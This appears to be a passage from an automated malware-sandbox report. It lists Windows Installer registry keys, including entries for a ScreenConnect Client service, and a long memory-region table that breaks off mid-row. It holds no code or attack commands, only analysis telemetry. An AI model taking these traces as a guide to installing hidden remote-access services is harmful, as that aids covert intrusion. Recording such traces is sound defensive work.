C:\Windows\Installer\{5432CC63-8BF4-F791-1B1A-15E2F80B3217}\
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\36CC23454FB8197FB1A1512E8FB02371\Patches
|
AllPatches
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\36CC23454FB8197FB1A1512E8FB02371
|
ProductName
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\36CC23454FB8197FB1A1512E8FB02371
|
PackageCode
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\36CC23454FB8197FB1A1512E8FB02371
|
Language
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\36CC23454FB8197FB1A1512E8FB02371
|
Version
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\36CC23454FB8197FB1A1512E8FB02371
|
Assignment
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\36CC23454FB8197FB1A1512E8FB02371
|
AdvertiseFlags
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\36CC23454FB8197FB1A1512E8FB02371
|
ProductIcon
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\36CC23454FB8197FB1A1512E8FB02371
|
InstanceType
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\36CC23454FB8197FB1A1512E8FB02371
|
AuthorizedLUAApp
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\36CC23454FB8197FB1A1512E8FB02371
|
DeploymentFlags
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\C18BA22B6B7B3C7E6EBC7782C47F56AA
|
36CC23454FB8197FB1A1512E8FB02371
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\36CC23454FB8197FB1A1512E8FB02371\SourceList
|
PackageName
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\36CC23454FB8197FB1A1512E8FB02371\SourceList\Net
|
1
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\36CC23454FB8197FB1A1512E8FB02371\SourceList\Media
|
1
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\36CC23454FB8197FB1A1512E8FB02371
|
Clients
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\36CC23454FB8197FB1A1512E8FB02371\SourceList
|
LastUsedSource
|
||
|
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\MUI\StringCacheSettings
|
StringCacheGeneration
|
||
|
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application
|
AutoBackupLogFiles
|
||
|
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application\ScreenConnect
|
EventMessageFile
|
||
|
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (e6cb77284cf765aa)
|
ImagePath
|
There are 89 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
1B1D000
|
trusted library allocation
|
page execute and read and write
|
||
|
2DD0000
|
heap
|
page execute and read and write
|
||
|
4703000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B47E000
|
heap
|
page read and write
|
||
|
3330000
|
heap
|
page execute and read and write
|
||
|
15AD000
|
stack
|
page read and write
|
||
|
4737000
|
trusted library allocation
|
page execute and read and write
|
||
|
EA0000
|
trusted library section
|
page read and write
|
||
|
9082000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7CEB0000
|
trusted library allocation
|
page read and write
|
||
|
473B000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFE7D070000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7CE90000
|
trusted library allocation
|
page read and write
|
||
|
A8D000
|
unkown
|
page readonly
|
||
|
7FFE7CFA0000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7CFBF000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7D050000
|
trusted library allocation
|
page read and write
|
||
|
8514000
|
trusted library allocation
|
page read and write
|
||
|
2C10000
|
heap
|
page read and write
|
||
|
FE2000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7CFB7000
|
trusted library allocation
|
page read and write
|
||
|
2BB4000
|
trusted library allocation
|
page read and write
|
||
|
4040000
|
trusted library allocation
|
page read and write
|
||
|
6040000
|
heap
|
page read and write
|
||
|
51EF000
|
stack
|
page read and write
|
||
|
7FFE7CF40000
|
trusted library allocation
|
page read and write
|
||
|
1B3A0000
|
unkown
|
page readonly
|
||
|
1B5E0000
|
unkown
|
page readonly
|
||
|
7FFE7CCEC000
|
trusted library allocation
|
page execute and read and write
|
||
|
1070000
|
trusted library allocation
|
page execute and read and write
|
||
|
A25000
|
heap
|
page read and write
|
||
|
10D8000
|
heap
|
page read and write
|
||
|
34D0000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7CE45000
|
trusted library allocation
|
page read and write
|
||
|
462E000
|
stack
|
page read and write
|
||
|
7FFE7CDB0000
|
trusted library allocation
|
page execute and read and write
|
||
|
4930000
|
trusted library allocation
|
page read and write
|
||
|
4050000
|
trusted library allocation
|
page read and write
|
||
|
1BBBE000
|
stack
|
page read and write
|
||
|
1B57D000
|
stack
|
page read and write
|
||
|
1B4B6000
|
heap
|
page read and write
|
||
|
1D0B7000
|
heap
|
page read and write
|
||
|
2B71000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7CEA2000
|
trusted library allocation
|
page read and write
|
||
|
48E0000
|
trusted library allocation
|
page read and write
|
||
|
5A80000
|
trusted library section
|
page read and write
|
||
|
4CC0000
|
trusted library allocation
|
page read and write
|
||
|
267F000
|
stack
|
page read and write
|
||
|
26E0000
|
heap
|
page read and write
|
||
|
5F20000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7CCBE000
|
trusted library allocation
|
page execute and read and write
|
||
|
106E000
|
stack
|
page read and write
|
||
|
7FFE7CD40000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7D140000
|
trusted library allocation
|
page read and write
|
||
|
109E000
|
heap
|
page read and write
|
||
|
A76000
|
heap
|
page read and write
|
||
|
8519000
|
trusted library allocation
|
page read and write
|
||
|
503D000
|
stack
|
page read and write
|
||
|
7FFE7CF29000
|
trusted library allocation
|
page read and write
|
||
|
1230000
|
heap
|
page read and write
|
||
|
47CE000
|
stack
|
page read and write
|
||
|
47AE000
|
stack
|
page read and write
|
||
|
1AA1000
|
trusted library allocation
|
page read and write
|
||
|
11F0000
|
heap
|
page read and write
|
||
|
2C3A000
|
heap
|
page read and write
|
||
|
7FFE7CEBE000
|
trusted library allocation
|
page read and write
|
||
|
5CC0000
|
trusted library section
|
page read and write
|
||
|
50E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1133000
|
heap
|
page read and write
|
||
|
A94000
|
unkown
|
page write copy
|
||
|
7FFE7CE88000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7CCB0000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7D080000
|
trusted library allocation
|
page read and write
|
||
|
71D0000
|
heap
|
page execute and read and write
|
||
|
8E14000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7D0B0000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7D020000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7D0B0000
|
trusted library allocation
|
page read and write
|
||
|
1B469000
|
heap
|
page read and write
|
||
|
12700000
|
trusted library allocation
|
page read and write
|
||
|
1341000
|
unkown
|
page readonly
|
||
|
5B40000
|
heap
|
page execute and read and write
|
||
|
56CE000
|
stack
|
page read and write
|
||
|
1BCC3000
|
heap
|
page read and write
|
||
|
7FFE7CF6D000
|
trusted library allocation
|
page read and write
|
||
|
F10000
|
heap
|
page read and write
|
||
|
7FFE7CC90000
|
trusted library allocation
|
page read and write
|
||
|
10CB000
|
heap
|
page read and write
|
||
|
D9C000
|
stack
|
page read and write
|
||
|
7FFE7CF03000
|
trusted library allocation
|
page read and write
|
||
|
1A70000
|
unkown
|
page readonly
|
||
|
5CA0000
|
trusted library section
|
page read and write
|
||
|
5C9D000
|
stack
|
page read and write
|
||
|
1C5C7000
|
stack
|
page read and write
|
||
|
7FFE7CF87000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7D0C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
128E000
|
stack
|
page read and write
|
||
|
5C50000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7CEA0000
|
trusted library allocation
|
page read and write
|
||
|
1BA1F000
|
stack
|
page read and write
|
||
|
7FFE7CEB9000
|
trusted library allocation
|
page read and write
|
||
|
4AFE000
|
stack
|
page read and write
|
||
|
7FFE7CE30000
|
trusted library allocation
|
page read and write
|
||
|
3C3E000
|
stack
|
page read and write
|
||
|
2C67000
|
heap
|
page read and write
|
||
|
7FFE7CEB7000
|
trusted library allocation
|
page read and write
|
||
|
4BFD000
|
stack
|
page read and write
|
||
|
615C000
|
trusted library section
|
page read and write
|
||
|
1BD07000
|
heap
|
page read and write
|
||
|
1B29F000
|
stack
|
page read and write
|
||
|
5F7E000
|
stack
|
page read and write
|
||
|
7FFE7CFE0000
|
trusted library allocation
|
page read and write
|
||
|
A20000
|
heap
|
page read and write
|
||
|
4770000
|
heap
|
page read and write
|
||
|
F44000
|
unkown
|
page read and write
|
||
|
2FF1000
|
trusted library allocation
|
page read and write
|
||
|
1B4D7000
|
heap
|
page read and write
|
||
|
2682000
|
unkown
|
page readonly
|
||
|
5E91000
|
trusted library allocation
|
page read and write
|
||
|
A96000
|
unkown
|
page readonly
|
||
|
DE0000
|
heap
|
page read and write
|
||
|
1C74000
|
trusted library allocation
|
page read and write
|
||
|
3FA2000
|
trusted library allocation
|
page read and write
|
||
|
19FB000
|
heap
|
page read and write
|
||
|
4ACE000
|
heap
|
page read and write
|
||
|
5C8E000
|
stack
|
page read and write
|
||
|
E7C000
|
stack
|
page read and write
|
||
|
7FFE7CD46000
|
trusted library allocation
|
page read and write
|
||
|
F00000
|
heap
|
page read and write
|
||
|
1B63000
|
trusted library allocation
|
page read and write
|
||
|
1B473000
|
heap
|
page read and write
|
||
|
7FFE7CEF1000
|
trusted library allocation
|
page read and write
|
||
|
3320000
|
trusted library allocation
|
page read and write
|
||
|
3FF0000
|
trusted library allocation
|
page read and write
|
||
|
EC8000
|
heap
|
page read and write
|
||
|
123C000
|
heap
|
page read and write
|
||
|
2AD6000
|
trusted library allocation
|
page read and write
|
||
|
49F0000
|
trusted library allocation
|
page read and write
|
||
|
3496000
|
trusted library allocation
|
page read and write
|
||
|
3521000
|
trusted library allocation
|
page read and write
|
||
|
49B3000
|
heap
|
page read and write
|
||
|
1B32000
|
trusted library allocation
|
page read and write
|
||
|
C4E000
|
stack
|
page read and write
|
||
|
FE5000
|
trusted library allocation
|
page execute and read and write
|
||
|
B4A000
|
heap
|
page read and write
|
||
|
15E0000
|
heap
|
page read and write
|
||
|
7FFE7CF35000
|
trusted library allocation
|
page read and write
|
||
|
2CB2000
|
heap
|
page read and write
|
||
|
15E5000
|
heap
|
page read and write
|
||
|
702C000
|
trusted library allocation
|
page read and write
|
||
|
1B42000
|
trusted library allocation
|
page read and write
|
||
|
5A0D000
|
stack
|
page read and write
|
||
|
4CC0000
|
trusted library allocation
|
page read and write
|
||
|
FB3000
|
trusted library allocation
|
page execute and read and write
|
||
|
7026000
|
trusted library allocation
|
page read and write
|
||
|
1A90000
|
heap
|
page execute and read and write
|
||
|
1027000
|
heap
|
page read and write
|
||
|
1B3A2000
|
unkown
|
page readonly
|
||
|
7FFE7CEBE000
|
trusted library allocation
|
page read and write
|
||
|
1E6C000
|
trusted library allocation
|
page read and write
|
||
|
2C79000
|
heap
|
page read and write
|
||
|
1C0B0000
|
heap
|
page read and write
|
||
|
7FFE7D150000
|
trusted library allocation
|
page read and write
|
||
|
94FE000
|
trusted library allocation
|
page read and write
|
||
|
4710000
|
trusted library allocation
|
page read and write
|
||
|
1B0BE000
|
stack
|
page read and write
|
||
|
7FFE7CF80000
|
trusted library allocation
|
page read and write
|
||
|
58CB000
|
stack
|
page read and write
|
||
|
109B000
|
heap
|
page read and write
|
||
|
7FFE7CC94000
|
trusted library allocation
|
page read and write
|
||
|
40A0000
|
unkown
|
page readonly
|
||
|
4C42000
|
trusted library allocation
|
page read and write
|
||
|
A58000
|
heap
|
page read and write
|
||
|
19C4000
|
heap
|
page read and write
|
||
|
13041000
|
trusted library allocation
|
page read and write
|
||
|
480000
|
unkown
|
page readonly
|
||
|
2A6F000
|
trusted library allocation
|
page read and write
|
||
|
4B3E000
|
stack
|
page read and write
|
||
|
7FFE7D030000
|
trusted library allocation
|
page read and write
|
||
|
84BE000
|
trusted library allocation
|
page read and write
|
||
|
4B50000
|
trusted library allocation
|
page read and write
|
||
|
FB0000
|
trusted library allocation
|
page read and write
|
||
|
4010000
|
trusted library allocation
|
page read and write
|
||
|
1560000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7CCAA000
|
trusted library allocation
|
page read and write
|
||
|
4730000
|
trusted library allocation
|
page read and write
|
||
|
5EE8000
|
trusted library allocation
|
page read and write
|
||
|
2AA7000
|
trusted library allocation
|
page read and write
|
||
|
7DF1000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7CF70000
|
trusted library allocation
|
page read and write
|
||
|
42E0000
|
unkown
|
page readonly
|
||
|
E99000
|
stack
|
page read and write
|
||
|
1B20000
|
trusted library allocation
|
page read and write
|
||
|
A50000
|
heap
|
page read and write
|
||
|
7FFE7CC90000
|
trusted library allocation
|
page read and write
|
||
|
1215000
|
heap
|
page read and write
|
||
|
32F4000
|
trusted library allocation
|
page read and write
|
||
|
73CE000
|
stack
|
page read and write
|
||
|
56BE000
|
stack
|
page read and write
|
||
|
A9B000
|
heap
|
page read and write
|
||
|
1B10000
|
trusted library allocation
|
page read and write
|
||
|
4CA0000
|
trusted library allocation
|
page read and write
|
||
|
A8D000
|
unkown
|
page readonly
|
||
|
4CC0000
|
trusted library allocation
|
page read and write
|
||
|
2CC8000
|
heap
|
page read and write
|
||
|
46DD000
|
trusted library allocation
|
page read and write
|
||
|
48C0000
|
trusted library allocation
|
page read and write
|
||
|
FD0000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7CFC0000
|
trusted library allocation
|
page read and write
|
||
|
27DE000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7CEE0000
|
trusted library allocation
|
page read and write
|
||
|
4B60000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7D080000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7CD4C000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFE7CFC0000
|
trusted library allocation
|
page read and write
|
||
|
34E0000
|
heap
|
page read and write
|
||
|
4CC6000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7CCB4000
|
trusted library allocation
|
page read and write
|
||
|
1A4F000
|
stack
|
page read and write
|
||
|
7FF4B24A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
A10000
|
trusted library allocation
|
page read and write
|
||
|
3FE9000
|
trusted library allocation
|
page read and write
|
||
|
1B36000
|
trusted library allocation
|
page execute and read and write
|
||
|
49A0000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7D010000
|
trusted library allocation
|
page read and write
|
||
|
1271000
|
heap
|
page read and write
|
||
|
7FFE7CED0000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7CEE5000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7CE38000
|
trusted library allocation
|
page read and write
|
||
|
12FFE000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7D053000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7CDC5000
|
trusted library allocation
|
page execute and read and write
|
||
|
1C820000
|
heap
|
page read and write
|
||
|
4CA0000
|
trusted library allocation
|
page read and write
|
||
|
405A000
|
trusted library allocation
|
page read and write
|
||
|
2680000
|
unkown
|
page readonly
|
||
|
5B8E000
|
stack
|
page read and write
|
||
|
4B49000
|
heap
|
page read and write
|
||
|
34BE000
|
stack
|
page read and write
|
||
|
190A000
|
heap
|
page read and write
|
||
|
4CC0000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7CFB0000
|
trusted library allocation
|
page read and write
|
||
|
8281000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7CC93000
|
trusted library allocation
|
page execute and read and write
|
||
|
1CFD000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7CF33000
|
trusted library allocation
|
page read and write
|
||
|
1BCEC000
|
heap
|
page read and write
|
||
|
7FFE7CF60000
|
trusted library allocation
|
page read and write
|
||
|
18FE000
|
stack
|
page read and write
|
||
|
1C810000
|
heap
|
page read and write
|
||
|
4CC0000
|
trusted library allocation
|
page read and write
|
||
|
1BCC5000
|
heap
|
page read and write
|
||
|
7FFE7D060000
|
trusted library allocation
|
page read and write
|
||
|
A8D000
|
heap
|
page read and write
|
||
|
7FFE7CD40000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7CF00000
|
trusted library allocation
|
page read and write
|
||
|
1210000
|
heap
|
page read and write
|
||
|
346F000
|
trusted library allocation
|
page read and write
|
||
|
3371000
|
trusted library allocation
|
page read and write
|
||
|
1B60000
|
heap
|
page read and write
|
||
|
4C90000
|
trusted library allocation
|
page read and write
|
||
|
764C000
|
stack
|
page read and write
|
||
|
4704000
|
trusted library allocation
|
page read and write
|
||
|
1E68000
|
trusted library allocation
|
page read and write
|
||
|
1560000
|
heap
|
page read and write
|
||
|
4B6C000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFE7CDCF000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFE7CE85000
|
trusted library allocation
|
page read and write
|
||
|
703E000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7CF21000
|
trusted library allocation
|
page read and write
|
||
|
1080000
|
trusted library allocation
|
page read and write
|
||
|
A0D000
|
stack
|
page read and write
|
||
|
8272000
|
trusted library allocation
|
page read and write
|
||
|
2E70000
|
heap
|
page execute and read and write
|
||
|
7FFE7CC94000
|
trusted library allocation
|
page read and write
|
||
|
1BC50000
|
heap
|
page read and write
|
||
|
7FFE7CD76000
|
trusted library allocation
|
page execute and read and write
|
||
|
BA0000
|
heap
|
page read and write
|
||
|
5ED0000
|
trusted library allocation
|
page read and write
|
||
|
1250000
|
heap
|
page read and write
|
||
|
1942000
|
heap
|
page read and write
|
||
|
5B4E000
|
stack
|
page read and write
|
||
|
7FFE7CF40000
|
trusted library allocation
|
page read and write
|
||
|
1B50000
|
heap
|
page read and write
|
||
|
84F8000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7D02B000
|
trusted library allocation
|
page read and write
|
||
|
4940000
|
trusted library allocation
|
page execute and read and write
|
||
|
4760000
|
heap
|
page readonly
|
||
|
4521000
|
trusted library allocation
|
page read and write
|
||
|
4CC0000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7CF70000
|
trusted library allocation
|
page read and write
|
||
|
923A000
|
trusted library allocation
|
page read and write
|
||
|
13000000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7CFF0000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7CFB3000
|
trusted library allocation
|
page read and write
|
||
|
A91000
|
heap
|
page read and write
|
||
|
1C64000
|
trusted library allocation
|
page read and write
|
||
|
2FEE000
|
stack
|
page read and write
|
||
|
2570000
|
heap
|
page execute and read and write
|
||
|
7FFE7CE3F000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7D040000
|
trusted library allocation
|
page read and write
|
||
|
4080000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7CFB0000
|
trusted library allocation
|
page read and write
|
||
|
552B000
|
stack
|
page read and write
|
||
|
FE7000
|
trusted library allocation
|
page execute and read and write
|
||
|
4B70000
|
heap
|
page read and write
|
||
|
FC0000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7CFD0000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7CEC8000
|
trusted library allocation
|
page read and write
|
||
|
5040000
|
trusted library allocation
|
page read and write
|
||
|
66B0000
|
heap
|
page read and write
|
||
|
7070000
|
trusted library allocation
|
page read and write
|
||
|
728E000
|
stack
|
page read and write
|
||
|
A70000
|
heap
|
page read and write
|
||
|
FB4000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7CFF0000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7CFBA000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7CCAD000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFE7CFD0000
|
trusted library allocation
|
page read and write
|
||
|
1BC8E000
|
stack
|
page read and write
|
||
|
CD0000
|
unkown
|
page readonly
|
||
|
12BB000
|
heap
|
page read and write
|
||
|
1279000
|
heap
|
page read and write
|
||
|
14E8000
|
stack
|
page read and write
|
||
|
FE0000
|
trusted library allocation
|
page read and write
|
||
|
4A20000
|
trusted library allocation
|
page read and write
|
||
|
4C40000
|
trusted library allocation
|
page read and write
|
||
|
FEB000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFE7CFE0000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7CEB0000
|
trusted library allocation
|
page read and write
|
||
|
5670000
|
trusted library allocation
|
page read and write
|
||
|
1580000
|
trusted library allocation
|
page read and write
|
||
|
EC0000
|
heap
|
page read and write
|
||
|
7FFE7CE80000
|
trusted library allocation
|
page read and write
|
||
|
1B14000
|
trusted library allocation
|
page read and write
|
||
|
49C1000
|
heap
|
page read and write
|
||
|
2DF0000
|
heap
|
page execute and read and write
|
||
|
420A000
|
heap
|
page read and write
|
||
|
15EE000
|
stack
|
page read and write
|
||
|
26F1000
|
trusted library allocation
|
page read and write
|
||
|
2C00000
|
heap
|
page read and write
|
||
|
1090000
|
heap
|
page read and write
|
||
|
7060000
|
trusted library allocation
|
page read and write
|
||
|
590000
|
heap
|
page read and write
|
||
|
E80000
|
heap
|
page read and write
|
||
|
7FFE7CF37000
|
trusted library allocation
|
page read and write
|
||
|
5B1C000
|
trusted library allocation
|
page read and write
|
||
|
127F000
|
heap
|
page read and write
|
||
|
7FFE7CD46000
|
trusted library allocation
|
page read and write
|
||
|
1C7BD000
|
stack
|
page read and write
|
||
|
4FF2000
|
trusted library allocation
|
page read and write
|
||
|
2EE0000
|
heap
|
page read and write
|
||
|
4C00000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7D026000
|
trusted library allocation
|
page read and write
|
||
|
1B4C6000
|
heap
|
page read and write
|
||
|
7FFE7CFB5000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7CF80000
|
trusted library allocation
|
page read and write
|
||
|
5C5000
|
heap
|
page read and write
|
||
|
13E0000
|
heap
|
page read and write
|
||
|
5680000
|
trusted library allocation
|
page read and write
|
||
|
2CBE000
|
heap
|
page read and write
|
||
|
7FFE7D140000
|
trusted library allocation
|
page read and write
|
||
|
1A60000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7D0A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
FD6000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFE7CF03000
|
trusted library allocation
|
page read and write
|
||
|
2CB8000
|
heap
|
page read and write
|
||
|
4097000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7CD50000
|
trusted library allocation
|
page execute and read and write
|
||
|
4CA0000
|
trusted library allocation
|
page read and write
|
||
|
1B30000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7CF50000
|
trusted library allocation
|
page read and write
|
||
|
294B000
|
stack
|
page read and write
|
||
|
A95000
|
heap
|
page read and write
|
||
|
7060000
|
trusted library allocation
|
page read and write
|
||
|
5B10000
|
trusted library allocation
|
page read and write
|
||
|
2C60000
|
heap
|
page read and write
|
||
|
48D0000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7CDD3000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFE7CE47000
|
trusted library allocation
|
page read and write
|
||
|
7090000
|
heap
|
page read and write
|
||
|
4CC0000
|
trusted library allocation
|
page read and write
|
||
|
1C07D000
|
stack
|
page read and write
|
||
|
1B9BF000
|
stack
|
page read and write
|
||
|
467F000
|
stack
|
page read and write
|
||
|
7FFE7CE4C000
|
trusted library allocation
|
page read and write
|
||
|
8F1000
|
stack
|
page read and write
|
||
|
493E000
|
stack
|
page read and write
|
||
|
1C3C8000
|
stack
|
page read and write
|
||
|
7FFE7D050000
|
trusted library allocation
|
page read and write
|
||
|
4060000
|
trusted library allocation
|
page execute and read and write
|
||
|
5EE0000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7CCB4000
|
trusted library allocation
|
page read and write
|
||
|
2C75000
|
heap
|
page read and write
|
||
|
1E5E000
|
trusted library allocation
|
page read and write
|
||
|
1B4A9000
|
heap
|
page read and write
|
||
|
1B476000
|
heap
|
page read and write
|
||
|
7FFE7CE60000
|
trusted library allocation
|
page read and write
|
||
|
1B4E4000
|
heap
|
page read and write
|
||
|
7FFE7CF89000
|
trusted library allocation
|
page read and write
|
||
|
9D0000
|
heap
|
page read and write
|
||
|
1AC7D000
|
stack
|
page read and write
|
||
|
1B89000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7CF90000
|
trusted library allocation
|
page read and write
|
||
|
5FA0000
|
trusted library section
|
page read and write
|
||
|
7065000
|
trusted library allocation
|
page read and write
|
||
|
4CC4000
|
trusted library allocation
|
page read and write
|
||
|
480F000
|
stack
|
page read and write
|
||
|
3FC1000
|
trusted library allocation
|
page read and write
|
||
|
9234000
|
trusted library allocation
|
page read and write
|
||
|
50D0000
|
trusted library allocation
|
page read and write
|
||
|
11D0000
|
heap
|
page read and write
|
||
|
343C000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7CCAD000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFE7CF60000
|
trusted library allocation
|
page read and write
|
||
|
4490000
|
unkown
|
page readonly
|
||
|
5A00000
|
trusted library allocation
|
page read and write
|
||
|
1BC5F000
|
heap
|
page read and write
|
||
|
1B471000
|
heap
|
page read and write
|
||
|
127D000
|
heap
|
page read and write
|
||
|
7041000
|
trusted library allocation
|
page read and write
|
||
|
1B3A000
|
trusted library allocation
|
page execute and read and write
|
||
|
1310E000
|
trusted library allocation
|
page read and write
|
||
|
1E62000
|
trusted library allocation
|
page read and write
|
||
|
13CE000
|
stack
|
page read and write
|
||
|
337E000
|
stack
|
page read and write
|
||
|
4C10000
|
heap
|
page read and write
|
||
|
681E000
|
stack
|
page read and write
|
||
|
5E7C000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7CE73000
|
trusted library allocation
|
page read and write
|
||
|
3FEB000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7D017000
|
trusted library allocation
|
page read and write
|
||
|
1E6A000
|
trusted library allocation
|
page read and write
|
||
|
F30000
|
unkown
|
page readonly
|
||
|
347F000
|
stack
|
page read and write
|
||
|
7FFE7CE30000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7CEC4000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7CDB3000
|
trusted library allocation
|
page execute and read and write
|
||
|
5F00000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7CF05000
|
trusted library allocation
|
page read and write
|
||
|
B9D000
|
stack
|
page read and write
|
||
|
6EF0000
|
heap
|
page read and write
|
||
|
4780000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFE7D0C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
10F1000
|
stack
|
page read and write
|
||
|
142F000
|
stack
|
page read and write
|
||
|
12FF1000
|
trusted library allocation
|
page read and write
|
||
|
7060000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7D020000
|
trusted library allocation
|
page read and write
|
||
|
4FF0000
|
trusted library allocation
|
page read and write
|
||
|
30B0000
|
trusted library allocation
|
page read and write
|
||
|
4C0B000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7D0A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
4CC4000
|
trusted library allocation
|
page read and write
|
||
|
4A10000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7CF6F000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7CEE7000
|
trusted library allocation
|
page read and write
|
||
|
64CE000
|
stack
|
page read and write
|
||
|
9362000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7D060000
|
trusted library allocation
|
page read and write
|
||
|
FD2000
|
trusted library allocation
|
page read and write
|
||
|
3FBE000
|
trusted library allocation
|
page read and write
|
||
|
1B13000
|
trusted library allocation
|
page execute and read and write
|
||
|
1C0A0000
|
heap
|
page read and write
|
||
|
7FFE7CD76000
|
trusted library allocation
|
page execute and read and write
|
||
|
48AE000
|
stack
|
page read and write
|
||
|
7FFE7CF50000
|
trusted library allocation
|
page read and write
|
||
|
5D0000
|
heap
|
page read and write
|
||
|
4C4A000
|
trusted library allocation
|
page read and write
|
||
|
19DB000
|
heap
|
page read and write
|
||
|
1BABF000
|
stack
|
page read and write
|
||
|
EC6000
|
heap
|
page read and write
|
||
|
7FFE7CCEC000
|
trusted library allocation
|
page execute and read and write
|
||
|
D4E000
|
stack
|
page read and write
|
||
|
5CE1000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7CE50000
|
trusted library allocation
|
page read and write
|
||
|
7FFE7CEC4000
|
trusted library allocation
|
page read and write
|
||
|
1B4CF000
|
heap
|
page read and write
|
||
|
5E8E000
|
trusted library allocation
|
page read and write
|
||
|
57CC000
|
stack
|
page read and write
|
||
|
476F000
|
stack
|
page read and write
|
||
|
7FFE7CCA3000
|
